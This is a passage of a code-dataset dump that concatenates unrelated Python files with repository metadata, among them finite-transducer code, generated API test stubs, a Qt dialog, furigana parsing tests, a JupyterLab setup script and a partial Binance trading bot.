q, a, b, r = line.split()
m.add_transition(state_index[q], a, b, state_index[r])
return m
def write(self, file):
"""Write a NFT to a file."""
file.write(' '.join(map(str, self.states)) + '\n')
alphabet = set(t.a for t in self.transitions if t.a != self.EPSILON)
file.write(' '.join(map(str, alphabet)) + '\n')
file.write(str(self.start) + '\n')
file.write(' '.join(map(str, self.accept)) + '\n')
for t in self.transitions:
file.write("{} {} {} {}\n".format(t.q, t.a, t.b, t.r))
def any_path(m):
"""Returns a path from the start state to an accept state, or raises
ValueError if there is none."""
if m.start in m.accept: return []
# Breadth-first search
agenda = collections.deque()
visited = set()
for t in m.transitions_from.get(m.start, []):
agenda.append([t])
visited.add(t.r)
while len(agenda) > 0:
path = agenda.popleft()
q = path[-1].r
if q in m.accept:
return path
for t in m.transitions_from.get(q, []):
if t.r not in visited:
agenda.append(path+[t])
visited.add(t.r)
#raise ValueError('no path')
return False
def is_empty(m):
"""Returns true iff an NFT recognizes the empty language."""
try:
path = m.any_path()
return False
except ValueError:
return True
@classmethod
def singleton(cls, w):
"""Returns a NFT that recognizes {w}."""
m = cls()
m.set_start(0)
for i,a in enumerate(w):
m.add_transition(i, a, a, i+1)
m.add_accept(len(w))
return m
@classmethod
def compose(cls, m1, m2):
"""Compose two finite transducers."""
ee = cls.EPSILON
def q(q1, q2): return q1*len(m2.states)+q2
m = cls()
m.set_start(q(m1.start,m2.start))
for a in m1.transitions_on:
for t1 in m1.transitions_on[a]:
if t1.b != ee:
for t2 in m2.transitions_on.get(t1.b, []):
m.add_transition(q(t1.q,t2.q), t1.a,t2.b, q(t1.r,t2.r))
else:
for q2 in m2.states:
m.add_transition(q(t1.q,q2), t1.a,ee, q(t1.r,q2))
for q1 in m1.states:
for t2 in m2.transitions_on.get(ee, []):
m.add_transition(q(q1,t2.q), ee,t2.b, q(q1,t2.r))
for q1 in m1.accept:
for q2 in m2.accept:
m.add_accept(q(q1,q2))
return m
if __name__ == "__main__":
filename = file('../examples/sipser-t1.nft')
nft = NFT.read(filename)
nft.write(file('text.txt', 'w'))
| 33.662252
| 79
| 0.531969
|
7abd25c628276de8c16b9db594c5fc4293100a32
| 1,983
|
py
|
Python
|
test/test_equipment_shared_io_module_ref.py
|
sdnit-se/intersight-python
|
551f7685c0f76bb8af60ec83ffb6f9672d49a4ae
|
[
"Apache-2.0"
] | 21
|
2018-03-29T14:20:35.000Z
|
2021-10-13T05:11:41.000Z
|
test/test_equipment_shared_io_module_ref.py
|
sdnit-se/intersight-python
|
551f7685c0f76bb8af60ec83ffb6f9672d49a4ae
|
[
"Apache-2.0"
] | 14
|
2018-01-30T15:45:46.000Z
|
2022-02-23T14:23:21.000Z
|
test/test_equipment_shared_io_module_ref.py
|
sdnit-se/intersight-python
|
551f7685c0f76bb8af60ec83ffb6f9672d49a4ae
|
[
"Apache-2.0"
] | 18
|
2018-01-03T15:09:56.000Z
|
2021-07-16T02:21:54.000Z
|
# coding: utf-8
"""
Cisco Intersight
Cisco Intersight is a management platform delivered as a service with embedded analytics for your Cisco and 3rd party IT infrastructure. This platform offers an intelligent level of management that enables IT organizations to analyze, simplify, and automate their environments in more advanced ways than the prior generations of tools. Cisco Intersight provides an integrated and intuitive management experience for resources in the traditional data center as well as at the edge. With flexible deployment options to address complex security needs, getting started with Intersight is quick and easy. Cisco Intersight has deep integration with Cisco UCS and HyperFlex systems allowing for remote deployment, configuration, and ongoing maintenance. The model-based deployment works for a single system in a remote location or hundreds of systems in a data center and enables rapid, standardized configuration and deployment. It also streamlines maintaining those systems whether you are working with small or very large configurations. # noqa: E501
The version of the OpenAPI document: 1.0.9-1295
Contact: intersight@cisco.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import intersight
from intersight.models.equipment_shared_io_module_ref import EquipmentSharedIoModuleRef # noqa: E501
from intersight.rest import ApiException
class TestEquipmentSharedIoModuleRef(unittest.TestCase):
"""EquipmentSharedIoModuleRef unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testEquipmentSharedIoModuleRef(self):
"""Test EquipmentSharedIoModuleRef"""
# FIXME: construct object with mandatory attributes with example values
# model = intersight.models.equipment_shared_io_module_ref.EquipmentSharedIoModuleRef() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 52.184211
| 1,052
| 0.787695
|
ccb461d21492ff537b91c0014522db556d24ea4b
| 2,079
|
py
|
Python
|
Lib/site-packages/hackedit/vendor/qcrash/_dialogs/review.py
|
fochoao/cpython
|
3dc84b260e5bced65ebc2c45c40c8fa65f9b5aa9
|
[
"bzip2-1.0.6",
"0BSD"
] | 30
|
2016-02-07T20:23:29.000Z
|
2022-02-23T08:44:25.000Z
|
Lib/site-packages/hackedit/vendor/qcrash/_dialogs/review.py
|
fochoao/cpython
|
3dc84b260e5bced65ebc2c45c40c8fa65f9b5aa9
|
[
"bzip2-1.0.6",
"0BSD"
] | 20
|
2021-05-03T18:02:23.000Z
|
2022-03-12T12:01:04.000Z
|
Lib/site-packages/hackedit/vendor/qcrash/_dialogs/review.py
|
fochoao/cpython
|
3dc84b260e5bced65ebc2c45c40c8fa65f9b5aa9
|
[
"bzip2-1.0.6",
"0BSD"
] | 5
|
2017-12-26T03:36:50.000Z
|
2020-12-10T07:09:14.000Z
|
"""
This module contains the review dialog.
"""
from qcrash.qt import QtCore, QtGui, QtWidgets
from qcrash._forms import dlg_review_ui
class DlgReview(QtWidgets.QDialog):
"""
Dialog for reviewing the final report.
"""
def __init__(self, content, log, parent, window_icon):
"""
:param content: content of the final report, before review
:param parent: parent widget
"""
super(DlgReview, self).__init__(parent)
self.ui = dlg_review_ui.Ui_Dialog()
self.ui.setupUi(self)
self.ui.tabWidget.setCurrentIndex(0)
self.ui.edit_main.setPlainText(content)
self.ui.edit_main.installEventFilter(self)
self.ui.edit_log.installEventFilter(self)
self.setWindowFlags(self.windowFlags() & ~QtCore.Qt.WindowContextHelpButtonHint)
self.setWindowIcon(
QtGui.QIcon.fromTheme('document-edit')
if window_icon is None else window_icon)
if log:
self.ui.edit_log.setPlainText(log)
else:
self.ui.tabWidget.tabBar().hide()
self.ui.edit_main.setFocus()
def eventFilter(self, obj, event):
interesting_objects = [self.ui.edit_log, self.ui.edit_main]
if obj in interesting_objects and event.type() == QtCore.QEvent.KeyPress:
if event.key() == QtCore.Qt.Key_Return and \
event.modifiers() & QtCore.Qt.ControlModifier:
self.accept()
return True
return False
@classmethod
def review(cls, content, log, parent, window_icon): # pragma: no cover
"""
Reviews the final bug report.
:param content: content of the final report, before review
:param parent: parent widget
:returns: the reviewed report content or None if the review was
canceled.
"""
dlg = DlgReview(content, log, parent, window_icon)
if dlg.exec_():
return dlg.ui.edit_main.toPlainText(), \
dlg.ui.edit_log.toPlainText()
return None, None
| 35.237288
| 88
| 0.623377
|
c69609583fc057f8425c08dff4fd056557e8cd27
| 3,640
|
py
|
Python
|
src/tools/docmaker/utils.py
|
hsmith/freetype
|
a1d3c0c8522cb703b5bdc6b3bff13d27819ef1ec
|
[
"FTL"
] | null | null | null |
src/tools/docmaker/utils.py
|
hsmith/freetype
|
a1d3c0c8522cb703b5bdc6b3bff13d27819ef1ec
|
[
"FTL"
] | null | null | null |
src/tools/docmaker/utils.py
|
hsmith/freetype
|
a1d3c0c8522cb703b5bdc6b3bff13d27819ef1ec
|
[
"FTL"
] | null | null | null |
#
# utils.py
#
# Auxiliary functions for the `docmaker' tool (library file).
#
# Copyright 2002-2016 by
# David Turner.
#
# This file is part of the FreeType project, and may only be used,
# modified, and distributed under the terms of the FreeType project
# license, LICENSE.TXT. By continuing to use, modify, or distribute
# this file you indicate that you have read the license and
# understand and accept it fully.
import string, sys, os, glob, itertools
# current output directory
#
output_dir = None
# A function that generates a sorting key. We want lexicographical order
# (primary key) except that capital letters are sorted before lowercase
# ones (secondary key).
#
# The primary key is implemented by lowercasing the input. The secondary
# key is simply the original data appended, character by character. For
# example, the sort key for `FT_x' is `fFtT__xx', while the sort key for
# `ft_X' is `fftt__xX'. Since ASCII codes of uppercase letters are
# numerically smaller than the codes of lowercase letters, `fFtT__xx' gets
# sorted before `fftt__xX'.
#
def index_key( s ):
return string.join( itertools.chain( *zip( s.lower(), s ) ) )
# Sort `input_list', placing the elements of `order_list' in front.
#
def sort_order_list( input_list, order_list ):
new_list = order_list[:]
for id in input_list:
if not id in order_list:
new_list.append( id )
return new_list
# Divert standard output to a given project documentation file. Use
# `output_dir' to determine the filename location if necessary and save the
# old stdout handle in a tuple that is returned by this function.
#
def open_output( filename ):
global output_dir
if output_dir and output_dir != "":
filename = output_dir + os.sep + filename
old_stdout = sys.stdout
new_file = open( filename, "w" )
sys.stdout = new_file
return ( new_file, old_stdout )
# Close the output that was returned by `open_output'.
#
def close_output( output ):
output[0].close()
sys.stdout = output[1]
# Check output directory.
#
def check_output():
global output_dir
if output_dir:
if output_dir != "":
if not os.path.isdir( output_dir ):
sys.stderr.write( "argument"
+ " '" + output_dir + "' "
+ "is not a valid directory\n" )
sys.exit( 2 )
else:
output_dir = None
def file_exists( pathname ):
"""Check that a given file exists."""
result = 1
try:
file = open( pathname, "r" )
file.close()
except:
result = None
sys.stderr.write( pathname + " couldn't be accessed\n" )
return result
def make_file_list( args = None ):
"""Build a list of input files from command-line arguments."""
file_list = []
# sys.stderr.write( repr( sys.argv[1 :] ) + '\n' )
if not args:
args = sys.argv[1:]
for pathname in args:
if string.find( pathname, '*' ) >= 0:
newpath = glob.glob( pathname )
newpath.sort() # sort files -- this is important because
# of the order of files
else:
newpath = [pathname]
file_list.extend( newpath )
if len( file_list ) == 0:
file_list = None
else:
# now filter the file list to remove non-existing ones
file_list = filter( file_exists, file_list )
return file_list
# eof
| 28.4375
| 76
| 0.609341
|
a9d66431865481d1e6ad001911f47523ebed8a20
| 1,503
|
py
|
Python
|
Chapter 2/Code/CurrentWeather.py
|
professor-li/book-dow-iot-projects
|
5b2b16459298a6503b87c17ac550e635299aa945
|
[
"MIT"
] | 17
|
2018-05-26T13:00:57.000Z
|
2021-11-11T09:07:18.000Z
|
Chapter 2/Code/CurrentWeather.py
|
professor-li/book-dow-iot-projects
|
5b2b16459298a6503b87c17ac550e635299aa945
|
[
"MIT"
] | null | null | null |
Chapter 2/Code/CurrentWeather.py
|
professor-li/book-dow-iot-projects
|
5b2b16459298a6503b87c17ac550e635299aa945
|
[
"MIT"
] | 16
|
2018-05-14T09:04:41.000Z
|
2021-11-11T09:07:22.000Z
|
class CurrentWeather:
weather_data={
'Toronto':['13','partly sunny','8 km/h NW'],
'Montreal':['16','mostly sunny','22 km/h W'],
'Vancouver':['18','thunder showers','10 km/h NE'],
'New York':['17','mostly cloudy','5 km/h SE'],
'Los Angeles':['28','sunny','4 km/h SW'],
'London':['12','mostly cloudy','8 km/h NW'],
'Mumbai':['33','humid and foggy','2 km/h S']
}
def __init__(self, city):
self.city = city
def getTemperature(self):
return self.weather_data[self.city][0]
def getWeatherConditions(self):
return self.weather_data[self.city][1]
def getWindSpeed(self):
return self.weather_data[self.city][2]
def getCity(self):
return self.city
if __name__ == "__main__":
currentWeather = CurrentWeather('New York')
wind_dir_str_len = 2
if currentWeather.getWindSpeed()[-2:-1] == ' ':
wind_dir_str_len = 1
print("The current temperature in", currentWeather.getCity(),"is",
currentWeather.getTemperature(), "degrees Celsius,",
"the weather conditions are",
currentWeather.getWeatherConditions(),
"and the wind is coming out of the",
currentWeather.getWindSpeed()[-(wind_dir_str_len):],
"direction with a speed of",
currentWeather.getWindSpeed()
[0:len(currentWeather.getWindSpeed())-(wind_dir_str_len)]
)
| 31.978723
| 70
| 0.575516
|
20edc8d26ce51ade1716d76add7bb7ecad15daed
| 502
|
py
|
Python
|
fixtures/models/login.py
|
spoon03/moodle_ui_test
|
550bc52fa69d32a9d377df0378f46430e8692c59
|
[
"Apache-2.0"
] | null | null | null |
fixtures/models/login.py
|
spoon03/moodle_ui_test
|
550bc52fa69d32a9d377df0378f46430e8692c59
|
[
"Apache-2.0"
] | null | null | null |
fixtures/models/login.py
|
spoon03/moodle_ui_test
|
550bc52fa69d32a9d377df0378f46430e8692c59
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import annotations
from faker import Faker
fake = Faker("Ru-ru")
class LoginData:
"""Методы для страницы логина."""
def __init__(self, login=None, password=None):
self.login = login
self.password = password
@staticmethod
def random() -> LoginData:
"""
Рандомизатор данных для логина.
:return:
"""
login = fake.email()
password = fake.password()
return LoginData(login=login, password=password)
| 22.818182
| 56
| 0.615538
|
8b0c8ac2f300406acee508e986a72810121d3088
| 1,571
|
py
|
Python
|
python3/icecreamstand.py
|
eiadshahtout/Python
|
b2406b0806bc55a9d8f5482a304a8d6968249018
|
[
"MIT"
] | null | null | null |
python3/icecreamstand.py
|
eiadshahtout/Python
|
b2406b0806bc55a9d8f5482a304a8d6968249018
|
[
"MIT"
] | null | null | null |
python3/icecreamstand.py
|
eiadshahtout/Python
|
b2406b0806bc55a9d8f5482a304a8d6968249018
|
[
"MIT"
] | null | null | null |
class Restaurant():
"""A class representing a restaurant."""
def __init__(self, name, cuisine_type):
"""Initialize the restaurant."""
self.name = name.title()
self.cuisine_type = cuisine_type
self.number_served = 0
def describe_restaurant(self):
"""Display a summary of the restaurant."""
msg = self.name + " serves wonderful " + self.cuisine_type + "."
print("\n" + msg)
def open_restaurant(self):
"""Display a message that the restaurant is open."""
msg = self.name + " is open. Come on in!"
print("\n" + msg)
def set_number_served(self, number_served):
"""Allow user to set the number of customers that have been served."""
self.number_served = number_served
def increment_number_served(self, additional_served):
"""Allow user to increment the number of customers served."""
self.number_served += additional_served
class IceCreamStand(Restaurant):
"""Represent an ice cream stand."""
def __init__(self, name, cuisine_type='ice_cream'):
"""Initialize an ice cream stand."""
super().__init__(name, cuisine_type)
self.flavors = []
def show_flavors(self):
"""Display the flavors available."""
print("\nWe have the following flavors available:")
for flavor in self.flavors:
print("- " + flavor.title())
big_one = IceCreamStand('The Big One')
big_one.flavors = ['vanilla', 'chocolate', 'black cherry']
big_one.describe_restaurant()
big_one.show_flavors()
| 32.729167
| 78
| 0.638447
|
640ab6cfa03b4a086b8d72a3f2a4a04117ce4403
| 4,729
|
py
|
Python
|
tests/test_furiganalyse.py
|
itsupera/furiganalyse
|
dac39bc1de2795b2c9b52c3e8678c3875bc5d9d0
|
[
"MIT"
] | 1
|
2022-01-19T16:45:23.000Z
|
2022-01-19T16:45:23.000Z
|
tests/test_furiganalyse.py
|
itsupera/furiganalyse
|
dac39bc1de2795b2c9b52c3e8678c3875bc5d9d0
|
[
"MIT"
] | null | null | null |
tests/test_furiganalyse.py
|
itsupera/furiganalyse
|
dac39bc1de2795b2c9b52c3e8678c3875bc5d9d0
|
[
"MIT"
] | null | null | null |
import xml.etree.ElementTree as ET
import pytest
from furiganalyse.parsing import process_tree
@pytest.mark.parametrize(
("test_case", "xml_str", "mode", "expected_xml_str"),
[
(
"Remove furigana",
'<body>はじめに、<ruby>第一<rt>ファースト</rt></ruby>歩。<ruby>終<rt>おわり</rt></ruby></body>',
"remove",
'<body>はじめに、第一歩。終</body>',
),
(
"Remove furigana, handling rb elements",
"<body>黒い服を着た大人<ruby><rb>達</rb><rt>たち</rt></ruby>の間に</body>",
"remove",
"<body>黒い服を着た大人達の間に</body>",
),
(
"Remove furigana, handling rp elements",
"<body><ruby>漢<rp>(</rp><rt>Kan</rt><rp>)</rp>字<rp>(</rp><rt>ji</rt><rp>)</rp></ruby></body>",
"remove",
"<body>漢字</body>",
),
(
"Remove furigana, parent node with text",
'<body><ruby>第一<rt>ファースト</rt></ruby></body>',
"remove",
'<body>第一</body>',
),
(
"Remove furigana, no text",
'<body><ruby><rt>ファースト</rt></ruby></body>',
"remove",
'<body></body>',
),
(
"Remove furigana, no text or childs",
'<body><ruby></ruby></body>',
"remove",
'<body></body>',
),
(
"Override furigana",
'<body>はじめに、<ruby>第一<rt>ファースト</rt></ruby>歩。<ruby>終<rt>おわり</rt></ruby></body>',
"replace",
'<body>はじめに、<ruby>第一歩<rt>だいいっぽ</rt></ruby>。<ruby>終<rt>おわり</rt></ruby></body>',
),
(
"Override furigana, handling rb elements",
"<body>大人<ruby><rb>達</rb><rt>あああ</rt></ruby>の間に</body>",
"replace",
"<body><ruby>大人<rt>おとな</rt></ruby><ruby>達<rt>たち</rt></ruby>の<ruby>間<rt>ま</rt></ruby>に</body>"
),
(
"Text may be positioned before, inside or after elements",
"""
<body class="p-text">
<div class="main2">
<p id="1">
1つの成功体験は
<a>ハーバード大学。</a>
その真ん中を
<span>はじめに、第一。</span>
</p>
その後で
</div>
</body>
""",
"add",
"""
<body class="p-text">
<div class="main2">
<p id="1">1つの<ruby>成功体験<rt>せいこうたいけん</rt></ruby>は<a>ハーバード<ruby>大学<rt>だいがく</rt></ruby>。</a>その<ruby>真<rt>ま</rt></ruby>ん<ruby>中<rt>なか</rt></ruby>を<span>はじめに、<ruby>第一<rt>だいいち</rt></ruby>。</span>
</p>その<ruby>後<rt>ご</rt></ruby>で</div>
</body>
""",
),
(
"Romaji is not modified",
'<body><p id="2">No kanji around here<br class="main"/></p></body>',
"add",
'<body><p id="2">No kanji around here<br class="main"/></p></body>',
),
(
"Escaped characters",
'<body>>ファスト&スロー<:'あなた'の意思"は"</body>',
"add",
'<body>>ファスト&スロー<:'あなた'の<ruby>意思<rt>いし</rt></ruby>"は"</body>',
),
(
"Applying the a title tag in the head",
'<head><title>世界一やさしい「やりたいこと」の見つけ方 人生のモヤモヤから解放される自己理解メソッド</title></head>',
"add",
'<head><title><ruby>世界一<rt>せかいいち</rt></ruby>やさしい「やりたいこと」の<ruby>見<rt>み</rt></ruby>つけ<ruby>方<rt>かた</rt></ruby> <ruby>人生<rt>じんせい</rt></ruby>のモヤモヤから<ruby>解放<rt>かいほう</rt></ruby>される<ruby>自己<rt>じこ</rt></ruby><ruby>理解<rt>りかい</rt></ruby>メソッド</title></head>',
),
(
"Don't override existing furigana",
'<body>はじめに、<ruby>第一<rt>ファースト</rt></ruby>歩。</body>',
"add",
'<body>はじめに、<ruby>第一<rt>ファースト</rt></ruby><ruby>歩<rt>ふ</rt></ruby>。</body>',
),
(
"Tag inside of ruby subtags",
'<body><ruby>一<rb><span>辿</span></rb><rt><span>たど</span></rt>二</ruby>三</body>',
"add",
'<body><ruby>一<rb><span>辿</span></rb><rt><span>たど</span></rt>二</ruby><ruby>三<rt>さん</rt></ruby></body>',
),
]
)
def test_process_tree(test_case, xml_str, mode, expected_xml_str):
template = """
<?xml version='1.0' encoding='utf-8'?>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:epub="http://www.idpf.org/2007/ops" xml:lang="ja" class="hltr">
{}
</html>
""".strip()
tree = ET.fromstring(template.format(xml_str))
process_tree(tree, mode)
expected_tree = ET.fromstring(template.format(expected_xml_str))
assert ET.tostring(tree, encoding='unicode') == ET.tostring(expected_tree, encoding='unicode')
| 36.658915
| 261
| 0.472827
|
9d87b063e4cdde167fef43cbeef6a33df51e183b
| 1,505
|
py
|
Python
|
src/keyboard-manager/core.py
|
danielcieslinski/milkeyways
|
14e13bf145853724a1f162ed44076b3e6efef19e
|
[
"Apache-2.0"
] | 1
|
2021-01-26T09:37:36.000Z
|
2021-01-26T09:37:36.000Z
|
src/keyboard-manager/core.py
|
danielcieslinski/milkeyways
|
14e13bf145853724a1f162ed44076b3e6efef19e
|
[
"Apache-2.0"
] | 1
|
2021-02-23T12:31:35.000Z
|
2021-02-23T12:31:35.000Z
|
src/keyboard-manager/core.py
|
danielcieslinski/milkeyways
|
14e13bf145853724a1f162ed44076b3e6efef19e
|
[
"Apache-2.0"
] | null | null | null |
# from keyboard import key_to_scan_codes
#TODO xmodmap bindings includding modifiers
from functools import partial
import subprocess
from os import system
from pyudev.wx import MonitorObserver
GLOBAL = 0
keyscanmap = {'a': 38, 'b': 56}
class KeyMapping:
from_key: str
target_key: str
def __init__(self, a, b):
self.from_key, self.target_key = a, b
@classmethod
def from_str(cls, e: str):
return cls(*cls.parse(e))
@staticmethod
def parse(e: str):
"""
:param e: 'a -> α'
:return:
"""
return e.replace(' ', '').split('->')
def __repr__(self):
return f'(from: {self.from_key}, to: {self.target_key})'
def cmd(command:str):
return system(command)
def key_to_scan_code(k):
return keyscanmap[k]
class XBinder:
range: GLOBAL
def _bind(self, mapping: KeyMapping):
c = f'xmodmap -e "keycode {key_to_scan_code(mapping.from_key)} = {mapping.target_key}"'
print(c)
return cmd(c)
def bind(self, mapping: KeyMapping):
"""
:param mapping: Keymapping
:return: unbind method if binding success
"""
# if self._bind(mapping).returncode != 0:
# raise Exception('error binding')
# -----------
umapping = KeyMapping(mapping.from_key, mapping.from_key)
return partial(self._bind, umapping)
handler = XBinder()
tmp = KeyMapping.from_str('a -> b')
ubound = handler.bind(tmp)
print(ubound)
ubound()
| 22.462687
| 95
| 0.615947
|
baf01d521e4f4c8db116313139dbb6930796ebae
| 2,856
|
py
|
Python
|
setup.py
|
rupanshi-chawda/jupyterlab-nm-theme
|
eb60ba684c3f0d68a8f1705c10e243470c56771b
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
rupanshi-chawda/jupyterlab-nm-theme
|
eb60ba684c3f0d68a8f1705c10e243470c56771b
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
rupanshi-chawda/jupyterlab-nm-theme
|
eb60ba684c3f0d68a8f1705c10e243470c56771b
|
[
"BSD-3-Clause"
] | null | null | null |
"""
jupyterlab-nm-theme setup
"""
import json
import sys
from pathlib import Path
import setuptools
HERE = Path(__file__).parent.resolve()
# Get the package info from package.json
pkg_json = json.loads((HERE / "package.json").read_bytes())
# The name of the project
name = "jupyterlab-nm-theme"
lab_path = (HERE / pkg_json["jupyterlab"]["outputDir"])
# Representative files that should exist after a successful build
ensured_targets = [
str(lab_path / "package.json")
]
labext_name = pkg_json["name"]
data_files_spec = [
("share/jupyter/labextensions/%s" % labext_name, str(lab_path.relative_to(HERE)), "**"),
("share/jupyter/labextensions/%s" % labext_name, str("."), "install.json"),
]
long_description = (HERE / "README.md").read_text()
version = (
pkg_json["version"]
.replace("-alpha.", "a")
.replace("-beta.", "b")
.replace("-rc.", "rc")
)
setup_args = dict(
name=name,
version=version,
url=pkg_json["homepage"],
author=pkg_json["author"]["name"],
author_email=pkg_json["author"]["email"],
description=pkg_json["description"],
license=pkg_json["license"],
license_file="LICENSE",
long_description=long_description,
long_description_content_type="text/markdown",
packages=setuptools.find_packages(),
install_requires=[],
zip_safe=False,
include_package_data=True,
python_requires=">=3.7",
platforms="Linux, Mac OS X, Windows",
keywords=["Jupyter", "JupyterLab", "JupyterLab3"],
classifiers=[
"License :: OSI Approved :: BSD License",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Framework :: Jupyter",
"Framework :: Jupyter :: JupyterLab",
"Framework :: Jupyter :: JupyterLab :: 3",
"Framework :: Jupyter :: JupyterLab :: Extensions",
"Framework :: Jupyter :: JupyterLab :: Extensions :: Prebuilt",
],
)
try:
from jupyter_packaging import (
wrap_installers,
npm_builder,
get_data_files
)
post_develop = npm_builder(
build_cmd="install:extension", source_dir="src", build_dir=lab_path
)
setup_args["cmdclass"] = wrap_installers(post_develop=post_develop, ensured_targets=ensured_targets)
setup_args["data_files"] = get_data_files(data_files_spec)
except ImportError as e:
import logging
logging.basicConfig(format="%(levelname)s: %(message)s")
logging.warning("Build tool `jupyter-packaging` is missing. Install it with pip or conda.")
if not ("--name" in sys.argv or "--version" in sys.argv):
raise e
if __name__ == "__main__":
setuptools.setup(**setup_args)
| 30.063158
| 104
| 0.658263
|
2873edbf5e8065274bd1ab098086ade30e121357
| 8,785
|
py
|
Python
|
trading-bot/main.py
|
cryptometa708/trading
|
0d190751646ccda1f2243073f02d0884e79dee66
|
[
"MIT"
] | 14
|
2022-03-18T15:53:58.000Z
|
2022-03-25T12:32:08.000Z
|
trading-bot/main.py
|
MrBakali/trading
|
0d190751646ccda1f2243073f02d0884e79dee66
|
[
"MIT"
] | 1
|
2021-09-25T16:30:39.000Z
|
2021-09-26T23:11:31.000Z
|
trading-bot/main.py
|
MrBakali/trading
|
0d190751646ccda1f2243073f02d0884e79dee66
|
[
"MIT"
] | 1
|
2022-01-20T12:13:32.000Z
|
2022-01-20T12:13:32.000Z
|
import ccxt
import config
import schedule
import pandas as pd
import numbers
pd.set_option('display.max_rows', None)
import warnings
warnings.filterwarnings('ignore')
from datetime import datetime
import time
from stockstats import StockDataFrame as Sdf
# how much quote currency example [DOGE] you want to spend on every trade
BALANCE = 0.5
# how percent you want to earn on every trade
PERCENT_OF_GAIN_IN_FIAT_CURRENCY = 10
# the crypto that yiou want to invest in
symbol = 'BNB/USDT'
# RSI parameters
RSI_OVERBOUGHT = 70
RSI_OVERSOLD = 30
# trade mode
TRADE = True
EXCHANGE = ccxt.binance({
'options': {
'adjustForTimeDifference': True,
},
'enableRateLimit': True,
"apiKey": config.BINANCE_API_KEY,
"secret": config.BINANCE_SECRET_KEY,
})
EXCHANGE.load_markets()
def create_stock(historical_data):
stock = Sdf.retype(historical_data)
return stock
def in_position(amount, price, limits, precision):
global symbol
condition = limits['amount']['min'] <= amount <= limits['amount']['max'] and limits['price'][
'min'] <= price <= limits['price']['max'] and precision['price'] >= float(
EXCHANGE.price_to_precision(symbol, price)) and (amount * price) >= limits['cost']['min'] and not isinstance(
limits['cost']['max'], numbers.Number) or (
isinstance(limits['cost']['max'], numbers.Number) and (amount * price) <= limits['cost']['max'])
return condition
def info(df):
data = dict()
online_balance = EXCHANGE.fetchBalance()
data["quote"] = online_balance['total'][symbol.split("/")[0]]
data["price"] = df['close'][len(df) - 1]
limits = EXCHANGE.markets[symbol]['limits']
precision = EXCHANGE.markets[symbol]['precision']
data["sell_fees"] = EXCHANGE.markets[symbol]['taker']
data["buy_fees"] = EXCHANGE.markets[symbol]['maker']
data["fiat"] = float((online_balance['total'][symbol.split("/")[1]] / data["price"]) * (1 - data["buy_fees"]))
if data["fiat"] >= BALANCE:
data["fiat"] = BALANCE
data["in_position_to_buy"] = in_position(data["fiat"], data["price"], limits, precision)
data["in_position_to_sell"] = in_position(data["quote"], data["price"], limits, precision)
return data
def sell(data):
print(f"before sell {data}")
# try to find open trades and sell them if the sell price is good and do not cost any charges
try:
trade_history = pd.read_csv("trades.csv")
except:
trade_history = pd.DataFrame(
columns=["symbol", "amount", "buy", "sell", "buy_price", "sell_price", "state", "buy_date", "sell_date"])
not_sold_trades = trade_history.loc[(trade_history['state'] == 0) & (trade_history['buy_price'] < data['price'])]
if data["in_position_to_sell"] and len(not_sold_trades) > 0:
for i in not_sold_trades.index:
sell_price = not_sold_trades['amount'][i] * data["price"]
buy_price = float(not_sold_trades['buy'][i])
if sell_price >= buy_price * (1 + (PERCENT_OF_GAIN_IN_FIAT_CURRENCY / 100)):
# if something going wrong we get a copy of our dataframe
roll_back = trade_history.copy()
trade_history['state'][i] = 1
trade_history['sell'][i] = sell_price
trade_history['sell_price'][i] = data["price"]
trade_history['sell_date'][i] = datetime.now().isoformat()
trade_history.to_csv("trades.csv", index=False, header=True)
try:
if TRADE:
return EXCHANGE.create_limit_sell_order(symbol, trade_history['amount'][i], data["price"])
except:
roll_back.to_csv("trades.csv", index=False, header=True)
file_put_contents("logs.txt", "exception in sell function check it")
return "not in position to sell"
return "not in position to sell"
def buy(data):
print(f"before buy {data}")
try:
trade_history = pd.read_csv("trades.csv")
except:
trade_history = pd.DataFrame(
columns=["symbol", "amount", "buy", "sell", "buy_price", "sell_price", "state", "buy_date", "sell_date"])
buy_price = data["fiat"] * (1 + 2 * data['buy_fees']) * data["price"]
sold_trades = trade_history.loc[trade_history['state'] == 1]
bought_trades = trade_history.loc[trade_history['state'] == 0]
average_sell_price = sold_trades["sell_price"].tail(20).mean()
average_buy_price = bought_trades["buy_price"].tail(20).mean()
formula = average_sell_price * (1 - (PERCENT_OF_GAIN_IN_FIAT_CURRENCY / (3 * 100)))
if trade_history.empty or (data["in_position_to_buy"] and ((sold_trades.size > 0 and formula >= data['price']) or (
sold_trades.size == 0 and average_buy_price >= data['price']))):
roll_back = trade_history.copy()
trade_history = trade_history.append(
{
"symbol": symbol,
"amount": data["fiat"],
"buy": buy_price,
"sell": 0.0,
"sell_price": 0.0,
"buy_price": data['price'],
"state": 0,
"buy_date": datetime.now().isoformat(),
"sell_date": 0
},
ignore_index=True)
trade_history.to_csv("trades.csv", index=False, header=True)
try:
if TRADE:
return EXCHANGE.create_limit_buy_order(symbol, data["fiat"], data["price"])
except Exception as error:
roll_back.to_csv("trades.csv", index=False, header=True)
file_put_contents("logs.txt", f"exception in buy function check it {error} {data}")
return None
def tr(data):
data['previous_close'] = data['close'].shift(1)
data['high-low'] = abs(data['high'] - data['low'])
data['high-pc'] = abs(data['high'] - data['previous_close'])
data['low-pc'] = abs(data['low'] - data['previous_close'])
return data[['high-low', 'high-pc', 'low-pc']].max(axis=1)
def atr(data, period):
data['tr'] = tr(data)
return data['tr'].rolling(period).mean()
def supertrend(df, period=7, atr_multiplier=1.5):
hl2 = (df['high'] + df['low']) / 2
df['atr'] = atr(df, period)
df['upperband'] = hl2 + (atr_multiplier * df['atr'])
df['lowerband'] = hl2 - (atr_multiplier * df['atr'])
df['in_uptrend'] = True
for current in range(1, len(df.index)):
previous = current - 1
if df['close'][current] > df['upperband'][previous]:
df['in_uptrend'][current] = True
elif df['close'][current] < df['lowerband'][previous]:
df['in_uptrend'][current] = False
else:
df['in_uptrend'][current] = df['in_uptrend'][previous]
if df['in_uptrend'][current] and df['lowerband'][current] < df['lowerband'][previous]:
df['lowerband'][current] = df['lowerband'][previous]
